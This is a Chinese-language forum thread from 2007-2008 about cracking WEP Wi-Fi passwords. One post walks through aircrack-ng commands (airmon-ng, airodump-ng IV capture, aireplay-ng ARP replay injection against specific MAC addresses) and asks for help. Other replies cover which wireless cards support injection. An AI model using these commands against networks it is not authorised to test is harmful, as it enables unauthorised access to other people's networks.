珠宝店 发表于 2007-9-20 21:29
呵呵,路过,支持!!!!!wlxzy 发表于 2007-9-26 16:05
<p>学习,顶上去</p>aniu99 发表于 2007-10-9 21:16
<p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">一、我的流程如下:</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">1、首先查看本地无线网卡,我的是eth1 ,是intel 的 2200bg;</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">2、然后启动无线网卡监听模式,至于频道,可以在airodump-ng 中更改-c 后面的参数,从1到13,然后看哪个频道有合适的AP和客户端。6号频道信号丰富<br/>airmon-ng start eth1 6</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">3、执行监听。<br/>airodump-ng --ivs -w abc -c 6 eth1</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">执行后,能发现很多东西,唯一问题是data包增长太慢,一个小时不到1000个。要等到20万个很难。</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman"></font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">4、准备采用arp攻击方式加快data包的获得<br/>假设 AP的MAC地址 00:19:E1:AC:CC:46 与该AP通讯的客户端MAC地址 00:16:2F:9A:ED:E3<br/>aireplay-ng -3 -b 00:19:E1:AC:CC:46 -h 00:16:2F:9A:ED:E3 eth1</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">刚开始时显示<br/>Read 20 packets(got 0 ARP requests),send 0 packets</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">一会儿显示<br/>Read 1500 packets(got 12 ARP requests),send 1000 packets</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">20分钟过后显示<br/>Read 85100 packets(got 1083 ARP requests),send 50000 packets</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">但问题是,data包增长缓慢,仅1000多个,这是什么原因呢?请教各位高手</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman"><br/>二、第二个问题</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">airmon-ng start wifi0 6<br/>wlanconfig ath0 destroy<br/>ifconfig ath1 up<br/>iwconfig ath1 mode monitor channel 6</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman">是不是等同 airmon-ng start ath1 6 的功能呢?</font></p><p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; mso-list: l0 level1 lfo1; tab-stops: list 18.0pt;"><font face="Times New Roman"></font></p>jinlei 发表于 2007-10-23 23:44
henhaoahappyplace 发表于 2007-11-2 11:27
2200bg 不支持注入的<br/>world0839 发表于 2007-11-10 20:44
<p>那INTEL的网卡能破吗</p><p></p>ggdlyg 发表于 2007-11-10 21:00
下个wifiway,用法和backtrack2一样,可能支持你的网卡cq8341 发表于 2007-11-4 15:30
<p>bt2对很多网卡都不支持的,我的dwl-122就在iwconfig这一关过不了。</p><p>iwconfig wlan0 mode monitor</p><p>系统提示说:invalid argument</p><p>就再也走不过了。</p>fuller0512 发表于 2007-12-16 21:41
仔细学习了,谢谢指导。toff 发表于 2008-1-14 14:08
<p>网页看不清楚</p>kaixinn 发表于 2008-10-18 13:29
kaixinn 发表于 2008-10-18 13:30